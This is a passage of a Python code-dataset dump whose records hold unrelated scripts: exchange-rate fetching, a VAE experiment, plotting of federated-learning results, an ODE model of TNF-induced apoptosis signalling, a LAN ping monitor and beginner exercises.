\n if action == 0:\n agentCurr['y'] = agentCurr['y'] + 1\n elif action == 1:\n agentCurr['x'] = agentCurr['x'] + 1\n elif action == 2:\n agentCurr['y'] = agentCurr['y'] - 1\n elif action == 3:\n agentCurr['x'] = agentCurr['x'] - 1\n\n dX = agentCurr['x'] - agentPrev['x'] \n dY = agentCurr['y'] - agentPrev['y']\n\n if dY > 1:\n dY = dY - self.rows\n\n if dY < -1:\n dY = dY + self.rows\n\n if dX > 1:\n dX = dX - self.cols\n\n if dX < -1:\n dX = dX + self.cols\n \n if dY == 1:\n a = 0\n elif dX == 1:\n a = 1\n elif dY == -1:\n a = 2\n elif dX == -1:\n a = 3\n else:\n a = 4\n\n #print 'sAct: %d Prev: (%d,%d) Curr: (%d,%d) Corr: (%d,%d) Mv: (%d,%d) -> (%d,%d) oAct: %d' % (action, agentPrev['x'], agentPrev['y'], self.original[i]['x'], self.original[i]['y'], agentCurr['x'], agentCurr['y'], agentCurr['x'] - agentPrev['x'], agentCurr['y'] - agentPrev['y'], dX, dY, a)\n\n return a \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n","sub_path":"pursuit/src/python_src/State.py","file_name":"State.py","file_ext":"py","file_size_in_byte":6175,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"240479279","text":"import logging\nimport pandasdmx as sdmx\nimport itertools\nimport csv\nimport datetime\nimport uuid\nimport holidays\n\nlogging.basicConfig(level=logging.INFO)\n\nWSDL_ADDR_STR = \"https://sdw-wsrest.ecb.europa.eu/service/\"\nRESOURCE = \"data\"\nFLOWREF = \"EXR\" # Data flow key for exchange rates (FlowRef)\n\n\"\"\"\nkey explanation by ECB: https://sdw-wsrest.ecb.europa.eu/help/\nthe frequency at which they are measured (e.g.: on a daily basis - code D),\nthe currency being measured (e.g.: US dollar - code USD),\nthe currency against which a currency is being measured (e.g.: Euro - code EUR),\nthe type of exchange rates (Foreign exchange reference rates - code SP00) and\nthe series variation (such as average or standardised measure for given frequency, code A).\n\"\"\"\n\n\nclass CurrencyCodes(object):\n @classmethod\n def currency_code_dict(cls) -> dict:\n currency_code_dict = {} # Create a dict of all currency codes to assert user input\n with open(\"currency_codes.csv\", \"r\") as f:\n reader = csv.reader(f)\n for row in reader:\n currency_code_dict[row[2]] = True\n return currency_code_dict.copy() # Return a copy to avoid modifying it\n\n\ndef assert_input_is_valid(from_currency_list: list, to_currency_list: list, from_date: str, to_date: str) -> bool:\n date_format = \"%Y-%m-%d\"\n\n try:\n for currency in from_currency_list + to_currency_list:\n assert CurrencyCodes.currency_code_dict().get(currency) is not None\n except AssertionError:\n raise ValueError(\"Currency %s supplied by user does not exist\" % currency)\n\n try:\n from_date_obj = datetime.datetime.strptime(from_date,\n date_format) # Will raise Value Error if date format is not correct\n to_date_obj = datetime.datetime.strptime(to_date, date_format)\n assert from_date_obj <= to_date_obj\n except AssertionError:\n raise ValueError(\"from_date %s is greater than to_date %s\" % from_date, to_date)\n\n try:\n assert from_currency_list != to_currency_list\n except AssertionError:\n raise ValueError(\"from_currency_list is equal to to_currency_list. Please select different currencies.\")\n\n\ndef get_nearest_workday(from_date: str) -> str:\n ecb_holidays = holidays.CountryHoliday('ECB') # Get the holidays of Euro central bank\n date_format = \"%Y-%m-%d\"\n\n try:\n assert from_date in ecb_holidays\n except AssertionError:\n from_date_object = datetime.datetime.strptime(from_date, date_format).date()\n logging.info(\"from_date %s is not an ECB workday. 
Selecting nearest earlier date\", from_date)\n for i in range(1, 10):\n if from_date_object - datetime.timedelta(days=i) in ecb_holidays:\n nearest_date = str(from_date_object - datetime.timedelta(days=i))\n logging.info(\"Nearest date found: %s\", nearest_date)\n return nearest_date\n\n\ndef get_conversion_rates_df(\n from_currency_list: list = [\"EUR\"],\n to_currency_list: list = [\"USD\"],\n from_date: str = str(datetime.date.today()),\n to_date: str = str(datetime.date.today())\n) -> None:\n assert_input_is_valid(from_currency_list, to_currency_list, from_date, to_date)\n from_date = get_nearest_workday(from_date)\n list_of_currencies_to_compare = itertools.product(from_currency_list, to_currency_list)\n\n key = dict(CURRENCY=from_currency_list + to_currency_list, FREQ='D', CURRENCY_DENOM='EUR')\n ecb = sdmx.Request('ECB')\n parameters = {\n 'startPeriod': from_date, # Start date of the time series\n 'endPeriod': to_date # End of the time series\n }\n data_msg = ecb.data('EXR', key=key, params=parameters)\n df = sdmx.to_pandas(data_msg.data[0], datetime='TIME_PERIOD')\n for conversion_pair in list_of_currencies_to_compare:\n df[\"EXR: \" + conversion_pair[0] + \"/\" + conversion_pair[1]] = df.D[conversion_pair[0]] / df.D[\n conversion_pair[1]]\n filename = str(datetime.date.today()) + str(uuid.uuid4())[0:8]\n df.to_excel(filename + \".xlsx\")\n","sub_path":"conversion_rates.py","file_name":"conversion_rates.py","file_ext":"py","file_size_in_byte":4094,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"482758949","text":"\ndef registerPredefined(modules_avail):\n for m in [\"modules\", \"events\", \"info\", \"settings\"]:\n module_name_id = 'miniflask.' + m\n importname = 'miniflask.modules.' + m\n modules_avail[module_name_id] = {\n 'id': module_name_id,\n 'importpath': \"system\",\n 'importname': importname,\n 'lowpriority': False\n }\n","sub_path":"util/miniflask/src/miniflask/modules/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":377,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"134134966","text":"#!/bin/python\nimport serial\nimport keyboard\nimport io\nfrom time import sleep\nser = serial.Serial(input(\"Serial port: \"))\nsio = io.TextIOWrapper(io.BufferedRWPair(ser, ser))\nwhile 1:\n\t#s = int(sio.readline())\n\ts = int(ser.read(2));\n\tif s > 9:\n\t\ts = s - 9\n\t\tif s == 1:\n\t\t\tkeyboard.release('e')\n\t\telif s == 2:\n\t\t\tkeyboard.release('space')\n\t\telif s == 3:\n\t\t\tkeyboard.release('shift')\n\t\telif s == 4:\n\t\t\tkeyboard.release('a')\n\t\telif s == 5:\n\t\t\tkeyboard.release('w')\n\t\telif s == 6:\n\t\t\tkeyboard.release('d')\n\t\telif s == 7:\n\t\t\tkeyboard.release('w')\n\t\telif s == 8:\n\t\t\tkeyboard.release('e')\n\t\telif s == 9:\n\t\t\tkeyboard.release('shift')\n\telse:\n\t\tif s == 1:\n\t\t\tkeyboard.press('e')\n\t\telif s == 2:\n\t\t\tkeyboard.press('space')\n\t\telif s == 3:\n\t\t\tkeyboard.press('shift')\n\t\telif s == 4:\n\t\t\tkeyboard.press('a')\n\t\telif s == 5:\n\t\t\tkeyboard.press('w')\n\t\telif s == 6:\n\t\t\tkeyboard.press('d')\n\t\telif s == 7:\n\t\t\tkeyboard.press('w')\n\t\telif s == 8:\n\t\t\tkeyboard.press('e')\n\t\telif s == 9:\n\t\t\tkeyboard.press('shift')\n\n","sub_path":"python/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":984,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"111152886","text":"# import tensorflow as tf\n# import numpy as np\n# import mnist_data\n# import os\nfrom rlkit.torch.vae.conv_vae import ConvVAE\nfrom rlkit.torch.vae.vae_trainer import ConvVAETrainer\nfrom rlkit.torch.vae.pusher2d_data import get_data\n# import plot_utils\n# import glob\n# import ss.path\n\n# import argparse\nfrom rlkit.launchers.arglauncher import run_variants\nimport rlkit.torch.pytorch_util as ptu\n\nfrom rlkit.misc.ml_util import PiecewiseLinearSchedule\n\ndef experiment(variant):\n if variant[\"use_gpu\"]:\n gpu_id = variant[\"gpu_id\"]\n ptu.set_gpu_mode(True)\n ptu.set_device(gpu_id)\n\n beta = variant[\"beta\"]\n representation_size = variant[\"representation_size\"]\n train_data, test_data = get_data(10000)\n m = ConvVAE(representation_size, input_channels=3)\n t = ConvVAETrainer(train_data,\n test_data,\n m,\n beta_schedule=PiecewiseLinearSchedule([0, 400, 800], [0.5, 0.5, beta])\n )\n for epoch in range(1001):\n t.train_epoch(epoch)\n t.test_epoch(epoch)\n t.dump_samples(epoch)\n\nif __name__ == \"__main__\":\n variants = []\n\n for representation_size in [4, 8, 16, 32]:\n variant = dict(\n beta=5.0,\n representation_size=representation_size,\n snapshot_mode=\"gap\",\n snapshot_gap=100,\n )\n variants.append(variant)\n run_variants(experiment, variants, run_id=1)\n","sub_path":"experiments/ashvin/vae/new_pusher2d_schedule.py","file_name":"new_pusher2d_schedule.py","file_ext":"py","file_size_in_byte":1397,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"156350767","text":"default = {\n \"fuente_titulo\" : (\"Inter\", 15),\n \"fuente_fields\": (\"Inter\", 12),\n \"color_bg_general\": \"white\",\n \"color_letra_general\": \"black\",\n \"color_letra_botones\": \"white\",\n \"color_bg_botones\": \"#455054\",\n \"color_input\": \"gray\",\n \"color_bg_canvas\": \"#F5F5DC\",\n \"color_green\": \"#C6E5B1\",\n \"color_red\": \"#FF6961\",\n \"color_yellow\": \"#FBC05F\",\n \"color_white\": \"#E8DCCA\",\n \"reference_width\" : 1200,\n \"reference_height\" : 500\n}","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":465,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"57538820","text":"import matplotlib\nmatplotlib.use('agg')\nimport matplotlib.pyplot as plt\nimport sys\nsys.path.insert(0,'..')\n\n\n\nMARKER_SIZE=0\n\n# Init\nplt.figure()\n\n#epochs = 50\n## Add vertical Lines\n#for i in range(epochs):\n# plt.axvline(\n# i+1, linewidth=0.5, color='black', linestyle='dotted', alpha=0.5)\n\n# No FL results\nfrom non_fedlearn_7_frames.raw_non_fedlearn_7_frames_200 import results\ntypes = ['test-top1', 'test-top3']\nlegend = {'test-top1': 'no-fl-top-1', 'test-top3': 'no-fl-top-3'}\n### IMPORTANT!!!!!!! LAST EPOCH IS LAST TEST WITH BEST RESULT AND CLUSTERING\nepochs = len(results) - 1\nX_AXIS = list(map(lambda x: x+1, range(epochs)))\nfor t in types:\n y_values = [(e, x[t]) for e, x in results.items()][:-1]\n y_values = list(sorted(y_values, key=lambda t: t[0])) # Order by epoch asc\n y_values = [x[1] for x in y_values]\n plt.plot(X_AXIS, y_values, linewidth=1, label=legend[t], marker='o', markersize=MARKER_SIZE)\n plt.legend(loc=\"upper right\")\n\n# IID results:\nfrom raw_5_clients_iid_7_frames_200_cr import results\nepochs = len(results)\nX_AXIS = list(map(lambda x: x+1, range(epochs)))\ntypes = ['test-top1', 'test-top3']\nlegend = {'test-top1': '5-clients-iid-top-1',\n 'test-top3': '5-clients-iid-top-3'}\nfor t in types:\n y_values = [x['test_result'][t] for x in results]\n plt.plot(X_AXIS,\n y_values,\n linewidth=1,\n label=legend[t],\n linestyle='solid',\n marker=\"^\",\n markersize=MARKER_SIZE)\n plt.legend(loc=\"upper right\")\n\n# NON-IID results:\nfrom raw_5_clients_non_iid_7_frames_200_cr import results\nepochs = len(results)\nX_AXIS = list(map(lambda x: x+1, range(epochs)))\ntypes = ['test-top1', 'test-top3']\nlegend = {'test-top1': '5-clients-non-iid-top-1',\n 'test-top3': '5-clients-non-iid-top-3'}\nfor t in types:\n y_values = [x['test_result'][t] for x in results]\n plt.plot(X_AXIS,\n y_values,\n linewidth=1,\n label=legend[t],\n linestyle='solid',\n marker=\"s\",\n markersize=MARKER_SIZE)\n plt.legend(loc=\"upper right\")\n\n# Limits\nplt.axis(xmin=0, xmax=epochs+1, ymin=0, ymax=100)\n\n# Labels\n#plt.title('1 input frame comparison with 9 clients')\nplt.ylabel('Accuracy')\nplt.xlabel('Epoch / Communication Round')\n\n# Save\nplt.savefig('result.png', dpi=400)\n","sub_path":"results/5_clients_7_frames/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":2347,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"468022285","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Nov 27 15:32:42 2020\r\n\r\n@author: b308 Yu-Chuan Chen\r\n\"\"\"\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport os\r\n\r\n#variable name\r\nsi = ['TNF', 'TNFR1', 'TNFR1a' , 'TRADD', 'TNFR1a_TRADD', 'TRAF2', 'early_complex', \r\n 'RIPK1','early_complex_RIPK1', 'IKK', 'early_complex_RIPK1_IKK', 'IKKa',\r\n 'IκB_NFκB', 'IκB_NFκB_IKKa', 'IκBp', 'NFκB', \r\n 'FADD', 'early_complex_RIPK1_FADD', 'TRADD_TRAF2_RIPK1_FADD', \r\n 'Caspase8', 'TRADD_TRAF2_RIPK1_FADD_Caspase8', 'Caspase8a', 'Caspase3', 'Caspase8a_Caspase3',\r\n 'Caspase3a', 'DNA_fragmentation', 'cIAP', 'Caspase3a_cIAP' ,'DNA', 'Caspase3a_DNA', 'IκB']\r\n\r\n#%% create data fold\r\npath = 'D:/Yu-Chuan/ForYuChuan/python program/survial_death_model/ODE/conc/'\r\n\r\ndef createFold(f_dir): \r\n try:\r\n os.makedirs(f_dir)\r\n except FileExistsError:\r\n print(\"The directory has been created on %s\" % f_dir) \r\n except OSError:\r\n print (\"Creation of the directory %s failed\" % f_dir) \r\n else:\r\n print (\"Successfully created the directory %s\" % f_dir)\r\n \r\n# f_dir = path + folder\r\nf_dir = path + 'result/' \r\ncreateFold(f_dir)\r\n\r\n# npy saving\r\nsave_name = path + 'SDM_ODE_conc'\r\n\r\n#%% kinetic Parameter and initial value\r\nk1 = 0.185 *1e-3 # sce-1*nM-1 \r\nk2 = 0.00125 *1e-3 \r\nk3 = 0.185 *1e-3 # sce-1*nM-1\r\nk4 = 0.00125 *1e-3 \r\nk5 = 0.185 *1e-3 # sce-1*nM-1\r\nk6 = 0.00125 *1e-3 \r\nk7 = 0.185 *1e-3 # sce-1*nM-1\r\nk8 = 0.00125 *1e-3 \r\nk9 = 0.185 *1e-3 # sce-1*nM-1\r\nk10 = 0.00125 *1e-3\r\nk11 = 0.37 *1e-3 \r\nk12 = 0.014 *1e-3 # sce-1*nM-1\r\nk13 = 0.00125 *1e-3\r\nk14 = 0.37 *1e-3 \r\nk15 = 0.185 *1e-3 # sce-1*nM-1\r\nk16 = 0.00125 *1e-3\r\nk17 = 0.37 *1e-3 \r\nk18 = 0.5 *1e-3 # sce-1*nM-1\r\nk19 = 0.2 *1e-3\r\nk20 = 0.1 *1e-3 \r\nk21 = 0.1 *1e-3 # sce-1*nM-1\r\nk22 = 0.06 *1e-3\r\nk23 = 100 *1e-3\r\nk24 = 0.185 *1e-3 # sce-1*nM-1\r\nk25 = 0.00125 *1e-3\r\nk26 = 0.37 *1e-3\r\nk27 = 0.37 *1e-3\r\nk28 = 0.5 *1e-3 # sce-1*nM-1\r\nk29 = 750 *1e-3 # sce-1*nM-1\r\np = 1.75 *1e-3 \r\n\r\n#initial value\r\na = 10.\r\nTNF = a #1\r\nTNFR1 = 100. #2\r\nTNFR1a = 0. #3 \r\nTRADD = 150. #4\r\nTNFR1a_TRADD = 0. #5\r\nTRAF2 = 100. #6\r\nearly_complex = 0. #7 TNFR1a_TRADD_TRAF2\r\nRIPK1 = 100. #8\r\nearly_complex_RIPK1 = 0. #9 # early complex\r\nIKK = 100. #10\r\nearly_complex_RIPK1_IKK = 0. #11 # survival complex \r\nIKKa = 0. #12\r\nIκB_NFκB = 250. #13\r\nIκB_NFκB_IKKa = 0. #14\r\nIκBp = 0. #15\r\nNFκB = 0. #16\r\nFADD = 100. #17\r\nearly_complex_RIPK1_FADD = 0. #18\r\nTRADD_TRAF2_RIPK1_FADD = 0. #19 (compleII)\r\nCaspase8 = 80. #20\r\nTRADD_TRAF2_RIPK1_FADD_Caspase8 = 0. #21 \r\nCaspase8a = 0. #22\r\nCaspase3 = 200. #23\r\nCaspase8a_Caspase3 = 0. #24\r\nCaspase3a = 0. #25\r\nDNA_fragmentation = 0. #26\r\ncIAP = 0. #27\r\nCaspase3a_cIAP = 0. #28\r\nDNA = 800. #29\r\nCaspase3a_DNA = 0. #30\r\nIκB = 0. 
#31\r\n\r\n#%% functions\r\ndef stoichoi_M (var):\r\n rxn = 2*var\r\n V = np.zeros((var,rxn))\r\n for i in range(var):\r\n V[i, 2*i] = 1\r\n V[i, 2*i+1] = -1 \r\n return V\r\n\r\ndef model(P, dt, NFkB_delay):\r\n \r\n [TNF, TNFR1, TNFR1a , TRADD, TNFR1a_TRADD, TRAF2, early_complex, \r\n RIPK1,early_complex_RIPK1, IKK, early_complex_RIPK1_IKK, IKKa,\r\n IκB_NFκB, IκB_NFκB_IKKa, IκBp, NFκB, \r\n FADD, early_complex_RIPK1_FADD, TRADD_TRAF2_RIPK1_FADD, \r\n Caspase8, TRADD_TRAF2_RIPK1_FADD_Caspase8, Caspase8a, Caspase3, Caspase8a_Caspase3,\r\n Caspase3a, DNA_fragmentation, cIAP, Caspase3a_cIAP, DNA, Caspase3a_DNA, IκB ] = P \r\n NFkB_delay = NFkB_delay\r\n \r\n D = np.array([\r\n # TNF c1\r\n k2*TNFR1a,\r\n k1*TNF*TNFR1,\r\n # TNFR1 c2\r\n (k2*TNFR1a + k17*early_complex_RIPK1_FADD + k11* early_complex_RIPK1_IKK)*10**(-1.7),\r\n k1*TNF*TNFR1a,\r\n #TNFR1a c3\r\n k1*TNF*TNFR1 + k4* TNFR1a_TRADD,\r\n k2*TNFR1a + k3* TNFR1a * TRADD,\r\n # TRADD c4\r\n k4* TNFR1a_TRADD + k11* early_complex_RIPK1_IKK + k20* TRADD_TRAF2_RIPK1_FADD_Caspase8,\r\n k3* TNFR1a* TRADD,\r\n # TNFR1a_TRADD c5\r\n k3* TNFR1a* TRADD + k6* early_complex,\r\n k4* TNFR1a_TRADD + k5* TNFR1a_TRADD* RIPK1,\r\n # RIPK1 c6\r\n k6* early_complex + k11* early_complex_RIPK1_IKK + k20* TRADD_TRAF2_RIPK1_FADD_Caspase8,\r\n k5* TNFR1a_TRADD * RIPK1,\r\n # early_complex c7\r\n k5* TNFR1a_TRADD * RIPK1 + k8* early_complex_RIPK1,\r\n k6* early_complex + k7* early_complex* RIPK1,\r\n # RIPK1 c8\r\n k8* early_complex_RIPK1 + k11* early_complex_RIPK1_IKK+ k20* TRADD_TRAF2_RIPK1_FADD_Caspase8,\r\n k7* early_complex* RIPK1,\r\n # early_complex_RIPK1 c9\r\n k7* early_complex* RIPK1 + k10* early_complex_RIPK1_IKK + k16* early_complex_RIPK1_FADD,\r\n k8* early_complex_RIPK1 + k9* early_complex_RIPK1*IKK + k15* early_complex_RIPK1 * FADD,\r\n # IKK c10\r\n k10* early_complex_RIPK1_IKK + k14* IκB_NFκB_IKKa,\r\n k9* early_complex_RIPK1* IKK,\r\n # early_complex_RIPK1_IKK c11\r\n k9* early_complex_RIPK1* IKK,\r\n k10* early_complex_RIPK1_IKK + k11* early_complex_RIPK1_IKK,\r\n # IKKa c12\r\n k11* early_complex_RIPK1_IKK + k13* IκB_NFκB_IKKa,\r\n k12* IKKa * IκB_NFκB,\r\n # IκB_NFκB c13,\r\n k13* IκB_NFκB_IKKa + k29* NFκB * IκB,\r\n k12* IKKa * IκB_NFκB,\r\n # IκB_NFκB_IKKa c14\r\n k12* IKKa * IκB_NFκB,\r\n k13* IκB_NFκB_IKKa + k14* IκB_NFκB_IKKa, \r\n # IκBp c15\r\n k14* IκB_NFκB_IKKa,\r\n 0,\r\n # NFκB c16 \r\n k14* IκB_NFκB_IKKa,\r\n k29* NFκB* IκB,\r\n # FADD c17\r\n k16* early_complex_RIPK1_FADD + k20* TRADD_TRAF2_RIPK1_FADD_Caspase8,\r\n k15* early_complex_RIPK1* FADD,\r\n # early_complex_RIPK1_FADD c18\r\n k15* early_complex_RIPK1* FADD,\r\n k16* early_complex_RIPK1_FADD + k17* early_complex_RIPK1_FADD,\r\n # TRADD_TRAF2_RIPK1_FADD c19\r\n k17* early_complex_RIPK1_FADD + k19* TRADD_TRAF2_RIPK1_FADD_Caspase8,\r\n k18* TRADD_TRAF2_RIPK1_FADD* Caspase8,\r\n # Caspase8 c20\r\n k19* TRADD_TRAF2_RIPK1_FADD_Caspase8,\r\n k18* TRADD_TRAF2_RIPK1_FADD* Caspase8,\r\n # TRADD_TRAF2_RIPK1_FADD_Caspase8 c21\r\n k18* TRADD_TRAF2_RIPK1_FADD* Caspase8,\r\n k19* TRADD_TRAF2_RIPK1_FADD_Caspase8 + k20* TRADD_TRAF2_RIPK1_FADD_Caspase8,\r\n # Caspase8a c22\r\n k20* TRADD_TRAF2_RIPK1_FADD_Caspase8 + k22* Caspase8a_Caspase3 + k23 * Caspase8a_Caspase3,\r\n k21* Caspase8a* Caspase3,\r\n # Caspase3 c23\r\n k22* Caspase8a_Caspase3 + k26* Caspase3a_DNA,\r\n k21* Caspase8a* Caspase3,\r\n # Caspase8a_Caspase3 c24\r\n k21* Caspase8a* Caspase3,\r\n k22* Caspase8a_Caspase3 + k23* Caspase8a_Caspase3,\r\n # Caspase3a c25\r\n k23* Caspase8a_Caspase3 + k25* Caspase3a_DNA,\r\n k28*cIAP* 
Caspase3a + k24* DNA* Caspase3a,\r\n # DNA_fragmentation c26\r\n k26* Caspase3a_DNA,\r\n 0,\r\n # cIAP c27\r\n p* NFkB_delay,\r\n k28* cIAP* Caspase3a,\r\n # Caspase3a_cIAP c28\r\n k28* cIAP* Caspase3a,\r\n 0,\r\n # DNA c29\r\n k25* Caspase3a_DNA,\r\n k24* Caspase3a* DNA,\r\n # Caspase3a_DNA c30\r\n k24* Caspase3a* DNA,\r\n k25* Caspase3a_DNA + k26* Caspase3a_DNA,\r\n # IkB c31\r\n p* NFkB_delay, \r\n k29* NFκB* IκB\r\n \r\n ]).reshape(2*var,1)\r\n \r\n VD = np.matmul(V,D)*dt \r\n \r\n return VD.reshape(len(P))\r\n\r\n# Euler method\r\ndef euler_claculate(model, P, dt, delay_time): \r\n P[:,0] = x0 \r\n delay_index = int(delay_time/dt)\r\n for i in range(t_step): \r\n NFkB_delay = P[15][max(0,i-delay_index)]\r\n P[:,i+1] = P[:,i] + model(P[:,i], dt ,NFkB_delay)\r\n \r\n return P\r\n\r\n#%% program runnig\r\n# varibles\r\nx0 = np.array([\r\n TNF, TNFR1, TNFR1a , TRADD, TNFR1a_TRADD, TRAF2, early_complex, \r\n RIPK1,early_complex_RIPK1, IKK, early_complex_RIPK1_IKK, IKKa,\r\n IκB_NFκB, IκB_NFκB_IKKa, IκBp, NFκB, \r\n FADD, early_complex_RIPK1_FADD, TRADD_TRAF2_RIPK1_FADD, \r\n Caspase8, TRADD_TRAF2_RIPK1_FADD_Caspase8, Caspase8a, Caspase3, Caspase8a_Caspase3,\r\n Caspase3a, DNA_fragmentation, cIAP, Caspase3a_cIAP ,DNA, Caspase3a_DNA, IκB\r\n ]) \r\n\r\n# initial condition\r\nt = 3600*12 \r\nt_step = 100000\r\nt_interval = np.linspace(0, t, t_step)\r\ndt = t_interval[-1]- t_interval[-2]\r\n\r\nX = np.zeros((len(x0), t_step+1))\r\nvar = len(x0)\r\nX[:,0] = x0 \r\n\r\nV = stoichoi_M(var)\r\ndelay_time = 60*20\r\n\r\n# calculate the result\r\nresult = euler_claculate(model, X, dt, delay_time)\r\nnp.save(save_name, result)\r\n\r\n#%% plot process\r\nXX = result[:, :-1]\r\n\r\nfor i , x in enumerate(XX) :\r\n plt.figure(figsize=(8.5,6), linewidth = 1.5)\r\n plt.plot(t_interval/60, x)\r\n #plt.legend([si[i]])\r\n plt.xlabel('time (min)', fontsize = 18)\r\n plt.ylabel('concentration (nM)', fontsize = 18) \r\n file_name = f_dir + si[i] + '.png'\r\n plt.xticks(fontsize=14)\r\n plt.yticks(fontsize=14)\r\n plt.savefig(file_name , dpi= 1500)\r\n\r\n","sub_path":"survial_death_model_conc.py","file_name":"survial_death_model_conc.py","file_ext":"py","file_size_in_byte":11496,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"495433562","text":"# https://askubuntu.com/questions/87665/how-do-i-change-the-hostname-without-a-restart\n# sudo hostname your-new-name\n\n# https://askubuntu.com/questions/224559/how-to-find-all-the-used-ip-addresses-on-a-network\n# https://nmap.org/download.html#macosx\n# nmap -sn 192.168.1.0/24\n\n# https://www.turnkeylinux.org/node/41\n#ifconfig eth0 192.168.0.10 netmask 255.255.255.0 up\n\n#https://pricklytech.wordpress.com/2013/04/24/ubuntu-change-hostname-permanently-using-the-command-line/\nfrom kzpy3.utils2 import *\nimport threading\n\nComputers = {\n\t'ubuntu_laptop2':\t'192.168.1.100',\n\t'Mr_Blue':\t\t\t'192.168.1.102',\n\t'Mr_Black':\t\t\t'192.168.1.101',\n\t'Mr_Orange':\t\t'192.168.1.103',\n\t'Mr_Yellow':\t\t'192.168.1.104',\n\t'Mr_Lt_Blue':\t\t'192.168.1.105',\n\t'Mr_Purple':\t\t'192.168.1.106',\n\t'iMac':\t\t\t\t'192.168.1.39',\n\t}\n\nComputers_online = {}\n\ndef ping_test(*args):\n\t\"\"\"\n\tArgs[IP_ADDRESS]\n\t\"\"\"\n\tArgs = args_to_dictionary(args)\n\tTrue\n\tresult = unix(d2n('sudo ping -c 1 -W 0.3 -i 0.2 ',Args[IP_ADDRESS]))\n\tfor i in rlen(result):\n\n\t\tif 'transmitted' in result[i]:\n\t\t\t#print result\n\t\t\tnum_str = result[i].split('transmitted')[1].split(' ')[1]\n\t\t\t#print num_str\n\t\t\treturn int(num_str)\n\ndef ping_status():\n\tprint('ping status:')\n\tfor k in sorted(Computers_online):\n\t\tprint(d2n('\\t',k,' (',Computers[k],') ',dp(time.time()-Computers_online[k],2),' s ago'))\n\nSTOP_PING_TEST_THREAD = 'STOP_PING_TEST_THREAD'\nP = {}\nP[STOP_PING_TEST_THREAD] = False\n\ndef ping_test_thread():\n\twhile True:\n\t\tif P[STOP_PING_TEST_THREAD]:\n\t\t\treturn\n\t\tfor k in sorted(Computers):\n\t\t\tif ping_test(IP_ADDRESS,Computers[k]):\n\t\t\t\tComputers_online[k] = time.time()\n\nthreading.Thread(target=ping_test_thread).start()","sub_path":"scratch/c/_networking.py","file_name":"_networking.py","file_ext":"py","file_size_in_byte":1651,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"597096288","text":"import os.path\ndef count_char(fn):\n if os.path.isfile(fn):\n with open(fn, 'r') as fh:\n total = 0\n for line in fh:\n total += len(line)\n return total\n\n\nfn = \"D:/chromium/SES2020spring-master/SES2020spring-master/unit2/readme.md\"\nfh = open(fn, \"r\").read()\n\nif os.path.isfile(fn):\n char_num = count_char(fn)\n line_num = fh.count(\"\\n\")\n words_num = len(fh.split())\n print('文件地址:{}\\n字符共{}个\\n行:{}\\n单词共{}个'.format(fn, char_num, line_num, words_num))\nelse:\n print('路径错误')","sub_path":"670homework2.py","file_name":"670homework2.py","file_ext":"py","file_size_in_byte":571,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"129726564","text":"class LDO(object):\n \"\"\"\n Live Data Object is the default and template data file loading class.\n\n This serves as a base for all other data objects. The default ``__init__``\n method need not be called for sub-classes however it must always be capable\n of taking no arguments to create a blank LDO.\n\n This object, as is, will simply load the lines of a text file\n \"\"\"\n def __init__(self):\n self.lines = []\n\n def load(self, text):\n \"\"\"Create the LDO from the given string argument ``text``.\"\"\"\n self.lines = []\n for line in text.split('\\n'):\n if line.strip():\n self.lines.append(line)\n\n def text(self):\n \"\"\"\n When the LDO is ready to be written back into a plain text file this\n method is used to get the text to fill the file with.\n \"\"\"\n if not self.lines:\n return ''\n elif len(self.lines) == 1:\n return self.lines[0] + '\\n'\n else:\n return '\\n'.join([line for line in self.lines if line.strip()]) + '\\n'\n","sub_path":"doby/ldo.py","file_name":"ldo.py","file_ext":"py","file_size_in_byte":1067,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"85264683","text":"#print(\"\\n\")\r\n#\r\n#paragraph = \"This is \\\r\n#some text\"\r\n#print (paragraph)\r\n#print(\"\\n\")\r\n#\r\n#arr = ['Mango' , 'Orange', 'Banana', 'Chickoo', 'Cherry', 'Peach']\r\n#\r\n#val1 = 10\r\n#print (val1)\r\n\r\na=not 5<4 \r\nprint (a)\r\n\r\na=20 \r\nb=20 \r\nif( a is b): \r\n print (\"a,b have same identity?\") \r\nelse: \r\n print (\"a,b are different identity?\") \r\n\r\nlist1 = ['Mango' , 'Orange', 'Banana', 'Chickoo', 'Cherry', 'Peach']\r\nlist2 = [55,66,99,65,78,12,98,67,45,88,12,56,66,100,121,22,444,446]\r\nprint (list2[-7:-3])\r\nprint (list2*9)\r\n#print (list2[:])\r\n\r\n\r\ntuple1 = ('Ahmed', 'Ali', 'Asif', 'Hamza', 'John', 'Shawn')\r\nprint(tuple1[::-1]) \r\nprint (tuple1*2)\r\n\r\na=(1,2,3,4,5,6,7,8,9,10)\r\nsliceObj = slice(2,5)\r\nprint (a[sliceObj])\r\n\r\ndic = {'Name':'Charlie', 'Age':'22', 'Hobby':'Progamming'}\r\nprint (dic)\r\n\r\n#input(\"\\n\\nPress the enter key to exit.\")\r\n\r\n#bitwise operators\r\na = 60 # 60 = 0011 1100\r\nb = 13 # 13 = 0000 1101\r\nprint (bin(a), bin(b))\r\nc= a & b\r\nprint (c)\r\n\r\n\r\n#membership operators\r\nx=10; 